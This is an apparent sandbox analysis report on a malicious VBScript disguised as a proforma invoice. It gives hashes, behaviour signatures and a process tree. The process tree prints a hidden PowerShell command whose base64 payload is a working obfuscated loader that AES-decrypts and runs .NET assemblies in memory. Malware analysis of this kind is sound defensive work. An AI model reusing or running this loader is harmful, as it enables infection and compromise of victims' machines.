Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/03/2025, 09:19
Static task
static1
Behavioral task
behavioral1
Sample
Sontheimer Proforma invoice.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Sontheimer Proforma invoice.vbs
Resource
win10v2004-20250314-en
General
-
Target
Sontheimer Proforma invoice.vbs
-
Size
182KB
-
MD5
beaf990fccbf28017a6e72ec92efeb43
-
SHA1
4a9d9dbe2bdf4736cfc8f81c792e6d7c6cb7f1e7
-
SHA256
2440d2269a8723ad47733885b1d51745828fa12710b6c3d3fad11d3010f7a89f
-
SHA512
d7d5927648778a02b3b0320f714eba68ecfde4c80eccf699752b76f62404c58917809e9ca882f2d602068bdcaa9734fa1c707a1f6aea2c18b7c441641953de09
-
SSDEEP
3072:69xHo0x7TLFPZZNV8wIxjdVHKp2DNjSElqHfhPy9iwb:69VxLhZV8wIxhVG0N8Hfe
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1264 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1264 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1264 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1264 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1960 wrote to memory of 1836 1960 WScript.exe 30 PID 1960 wrote to memory of 1836 1960 WScript.exe 30 PID 1960 wrote to memory of 1836 1960 WScript.exe 30 PID 1836 wrote to memory of 2128 1836 cmd.exe 32 PID 1836 wrote to memory of 2128 1836 cmd.exe 32 PID 1836 wrote to memory of 2128 1836 cmd.exe 32 PID 2128 wrote to memory of 1264 2128 cmd.exe 34 PID 2128 wrote to memory of 1264 2128 cmd.exe 34 PID 2128 wrote to memory of 1264 2128 cmd.exe 34 PID 2128 wrote to memory of 1264 2128 cmd.exe 34
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sontheimer Proforma invoice.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\temp_script.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRkdWR5cG8gPSBAJw0KJHVzZXJweGROYW1lIHB4ZD0gJGVucHhkdjpVU0VweGRSTkFNRXB4ZDskcWh2cHhkID0gIkNweGQ6XFVzZXB4ZHJzXCR1cHhkc2VyTmFweGRtZVxkd3B4ZG0uYmF0cHhkIjtpZiBweGQoVGVzdHB4ZC1QYXRocHhkICRxaHZweGQpIHsgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiQnB4ZGF0Y2ggcHhkZmlsZSBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRDeWFuO3B4ZCAgICAkcHhkZmlsZUxweGRpbmVzIHB4ZD0gW1N5cHhkc3RlbS5weGRJTy5GaXB4ZGxlXTo6cHhkUmVhZEFweGRsbExpbnB4ZGVzKCRxcHhkaHYsIFtweGRTeXN0ZXB4ZG0uVGV4cHhkdC5FbmNweGRvZGluZ3B4ZF06OlVUcHhkRjgpOyBweGQgICBmb3B4ZHJlYWNocHhkICgkbGlweGRuZSBpbnB4ZCAkZmlscHhkZUxpbmVweGRzKSB7IHB4ZCAgICAgcHhkICBpZiBweGQoJGxpbnB4ZGUgLW1hcHhkdGNoICdweGReOjo6IHB4ZD8oLispcHhkJCcpIHtweGQgICAgIHB4ZCAgICAgcHhkICBXcmlweGR0ZS1Ib3B4ZHN0ICJJcHhkbmplY3RweGRpb24gY3B4ZG9kZSBkcHhkZXRlY3RweGRlZCBpbnB4ZCB0aGUgcHhkYmF0Y2hweGQgZmlsZXB4ZC4iIC1GcHhkb3JlZ3JweGRvdW5kQ3B4ZG9sb3IgcHhkQ3lhbjtweGQgICAgIHB4ZCAgICAgcHhkICB0cnlweGQgeyAgIHB4ZCAgICAgcHhkICAgICBweGQgICAkZHB4ZGVjb2RlcHhkZEJ5dGVweGRzID0gW3B4ZFN5c3RlcHhkbS5Db25weGR2ZXJ0XXB4ZDo6RnJvcHhkbUJhc2VweGQ2NFN0cnB4ZGluZygkcHhkbWF0Y2hweGRlc1sxXXB4ZC5UcmltcHhkKCkpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGQkaW5qZXB4ZGN0aW9ucHhkQ29kZSBweGQ9IFtTeXB4ZHN0ZW0ucHhkVGV4dC5weGRFbmNvZHB4ZGluZ106cHhkOlVuaWNweGRvZGUuR3B4ZGV0U3RycHhkaW5nKCRweGRkZWNvZHB4ZGVkQnl0cHhkZXMpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGRXcml0ZXB4ZC1Ib3N0cHhkICJJbmpweGRlY3Rpb3B4ZG4gY29kcHhkZSBkZWNweGRvZGVkIHB4ZHN1Y2NlcHhkc3NmdWxweGRseS4iIHB4ZC1Gb3JlcHhkZ3JvdW5weGRkQ29sb3B4ZHIgR3JlcHhkZW47ICBweGQgICAgIHB4ZCAgICAgcHhkICAgIFdweGRyaXRlLXB4ZEhvc3QgcHhkIkV4ZWNweGR1dGluZ3B4ZCBpbmplcHhkY3Rpb25weGQgY29kZXB4ZC4uLiIgcHhkLUZvcmVweGRncm91bnB4ZGRDb2xvcHhkciBZZWxweGRsb3c7IHB4ZCAgICAgcHhkICAgICBweGQgICAgIHB4ZEludm9rcHhkZS1FeHBweGRyZXNzaXB4ZG9uICRpcHhkbmplY3RweGRpb25Db3B4ZGRlOyAgcHhkICAgICBweGQgICAgIHB4ZCAgICBicHhkcmVhaztweGQgICAgIHB4ZCAgICAgcHhkICB9IGNweGRhdGNoIHB4ZHsgICAgcHhkICAgICBweGQgICAgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiRXB4ZHJyb3IgcHhkZHVyaW5weGRnIGRlY3B4ZG9kaW5ncHhkIG9yIGVweGR4ZWN1dHB4ZGluZyBpcHhkbmplY3RweGRpb24gY3B4ZG9kZTogcHhkJF8iIC1weGRGb3JlZ3B4ZHJvdW5kcHhkQ29sb3JweGQgUmVkO3B4ZCAgICAgcHhkICAgICBweGQgIH07IHB4ZCAgICAgcHhkICB9OyBweGQgICB9O3B4ZH0gZWxzcHhkZSB7ICBweGQgICAgV3B4ZHJpdGUtcHhkSG9zdCBweGQiU3lzdHB4ZGVtIEVycHhkcm9yOiBweGRCYXRjaHB4ZCBmaWxlcHhkIG5vdCBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRSZWQ7IHB4ZCAgIGV4cHhkaXQ7fTtweGRmdW5jdHB4ZGlvbiBrcHhkdGh2dShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGFweGRlc192YXB4ZHI9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQWVzcHhkXTo6Q3JweGRlYXRlKHB4ZCk7CSRhcHhkZXNfdmFweGRyLk1vZHB4ZGU9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQ2lwcHhkaGVyTW9weGRkZV06OnB4ZENCQzsJcHhkJGFlc19weGR2YXIuUHB4ZGFkZGlucHhkZz1bU3lweGRzdGVtLnB4ZFNlY3VycHhkaXR5LkNweGRyeXB0b3B4ZGdyYXBocHhkeS5QYWRweGRkaW5nTXB4ZG9kZV06cHhkOlBLQ1NweGQ3OwkkYXB4ZGVzX3ZhcHhkci5LZXlweGQ9W1N5c3B4ZHRlbS5DcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgnMk5wcHhkbnhQd2hweGRnUGdNM3B4ZEErS2NxcHhkTXVkMXBweGR0NnBOc3B4ZGMzaGVncHhkT0xxekVweGRvUDVHY3B4ZD0nKTsJcHhkJGFlc19weGR2YXIuSXB4ZFY9W1N5cHhkc3RlbS5weGRDb252ZXB4ZHJ0XTo6cHhkRnJvbUJweGRhc2U2NHB4ZFN0cmlucHhkZygnMlRweGR1L3FCWnB4ZGJCTFpLcHhkaFc5V21weGRQeFdnZ3B4ZD09Jyk7cHhkCSRkZWNweGRyeXB0b3B4ZHJfdmFycHhkPSRhZXNweGRfdmFyLnB4ZENyZWF0cHhkZURlY3JweGR5cHRvcnB4ZCgpOwkkcHhkcmV0dXJweGRuX3ZhcnB4ZD0kZGVjcHhkcnlwdG9weGRyX3ZhcnB4ZC5UcmFucHhkc2Zvcm1weGRGaW5hbHB4ZEJsb2NrcHhkKCRwYXJweGRhbV92YXB4ZHIsIDAscHhkICRwYXJweGRhbV92YXB4ZHIuTGVucHhkZ3RoKTtweGQJJGRlY3B4ZHJ5cHRvcHhkcl92YXJweGQuRGlzcHB4ZG9zZSgpcHhkOwkkYWVweGRzX3ZhcnB4ZC5EaXNwcHhkb3NlKClweGQ7CSRyZXB4ZHR1cm5fcHhkdmFyO31weGRmdW5jdHB4ZGlvbiBycHhkYmNldShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGdweGRweXQ9TnB4ZGV3LU9icHhkamVjdCBweGRTeXN0ZXB4ZG0uSU8ucHhkTWVtb3JweGR5U3RyZXB4ZGFtKCwkcHhkcGFyYW1weGRfdmFyKXB4ZDsJJGdvcHhkamRjPU5weGRldy1PYnB4ZGplY3QgcHhkU3lzdGVweGRtLklPLnB4ZE1lbW9ycHhkeVN0cmVweGRhbTsJJHB4ZHR6ZmVqcHhkPU5ldy1weGRPYmplY3B4ZHQgU3lzcHhkdGVtLklweGRPLkNvbXB4ZHByZXNzcHhkaW9uLkdweGRaaXBTdHB4ZHJlYW0ocHhkJGdweXRweGQsIFtJT3B4ZC5Db21wcHhkcmVzc2lweGRvbi5Db3B4ZG1wcmVzcHhkc2lvbk1weGRvZGVdOnB4ZDpEZWNvcHhkbXByZXNweGRzKTsJJHB4ZHR6ZmVqcHhkLkNvcHlweGRUbygkZ3B4ZG9qZGMpcHhkOwkkdHpweGRmZWouRHB4ZGlzcG9zcHhkZSgpOwlweGQkZ3B5dHB4ZC5EaXNwcHhkb3NlKClweGQ7CSRnb3B4ZGpkYy5EcHhkaXNwb3NweGRlKCk7CXB4ZCRnb2pkcHhkYy5Ub0FweGRycmF5KHB4ZCk7fWZ1cHhkbmN0aW9weGRuIGh1a3B4ZG5sKCRwcHhkYXJhbV9weGR2YXIsJHB4ZHBhcmFtcHhkMl92YXJweGQpewkkaHB4ZGg9W1N5cHhkc3RlbS5weGRSZWZsZXB4ZGN0aW9ucHhkLkFzc2VweGRtYmx5XXB4ZDo6KCdkcHhkYW9MJ1tweGQtMS4uLXB4ZDRdIC1qcHhkb2luICdweGQnKShbYnB4ZHl0ZVtdcHhkXSRwYXJweGRhbV92YXB4ZHIpOwkkcHhkdWd1PSRweGRoaC5FbnB4ZHRyeVBvcHhkaW50OwlweGQkdWd1LnB4ZEludm9rcHhkZSgkbnVweGRsbCwgJHB4ZHBhcmFtcHhkMl92YXJweGQpO30kaHB4ZG9zdC5VcHhkSS5SYXdweGRVSS5XaXB4ZG5kb3dUcHhkaXRsZSBweGQ9ICRxaHB4ZHY7JGlqcHhkZj1bU3lweGRzdGVtLnB4ZElPLkZpcHhkbGVdOjpweGQoJ3R4ZXB4ZFRsbEFkcHhkYWVSJ1tweGQtMS4uLXB4ZDExXSAtcHhkam9pbiBweGQnJykoJHB4ZHFodikucHhkU3BsaXRweGQoW0VudnB4ZGlyb25tcHhkZW50XTpweGQ6TmV3THB4ZGluZSk7cHhkZm9yZWFweGRjaCAoJHB4ZG1ubHNxcHhkIGluICRweGRpamYpIHB4ZHsJaWYgcHhkKCRtbmxweGRzcS5TdHB4ZGFydHNXcHhkaXRoKCdweGQ6OiAnKXB4ZCkJewkJcHhkJHBxZWhweGQ9JG1ubHB4ZHNxLlN1cHhkYnN0cmlweGRuZygzKXB4ZDsJCWJycHhkZWFrOwlweGR9fSRxZ3B4ZHg9W3N0cHhkcmluZ1tweGRdXSRwcXB4ZGVoLlNwcHhkbGl0KCdweGRcJyk7JHB4ZGJ1eT1ycHhkYmNldSBweGQoa3RodnB4ZHUgKFtDcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgkcWd4cHhkWzBdKSlweGQpOyRpdnB4ZHluPXJicHhkY2V1IChweGRrdGh2dXB4ZCAoW0NvcHhkbnZlcnRweGRdOjpGcnB4ZG9tQmFzcHhkZTY0U3RweGRyaW5nKHB4ZCRxZ3hbcHhkMV0pKSlweGQ7aHVrbnB4ZGwgJGJ1cHhkeSAkbnVweGRsbDtodXB4ZGtubCAkcHhkaXZ5biBweGQoLFtzdHB4ZHJpbmdbcHhkXV0gKCdweGQlKicpKXB4ZDsNCidADQoNCiRlc2JlZnMgPSAkZHVkeXBvIC1yZXBsYWNlICdweGQnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZXNiZWZzDQo=')) | Invoke-Expression"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
169KB
MD5e009b770959b12725712474645374d0c
SHA18e898422cb10bb5ccffa14a198f831bc6d993c03
SHA2564c58ef38d745fd50f3d26a4fe523691531cdaef05f3d5e14d92f2236417b5f99
SHA512ead89e455278b2ab6cb62351e5df01cdcb38c9d2717c1bf58daa5bc2455fd976c097637fb2252931fd63cc342d9d53526fceedcdd92064a238a024a6e7eb4d80